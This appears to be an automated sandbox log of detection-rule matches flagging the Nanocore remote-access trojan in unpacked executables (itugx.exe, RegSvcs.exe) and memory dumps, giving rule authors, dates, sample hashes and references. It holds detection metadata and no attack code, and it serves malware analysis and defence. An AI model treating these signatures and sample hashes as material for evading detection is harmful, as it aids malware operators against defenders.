Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000005.00000003.451151702.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth (Nextron Systems), description = Detects LNK file with suspicious content, score =
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
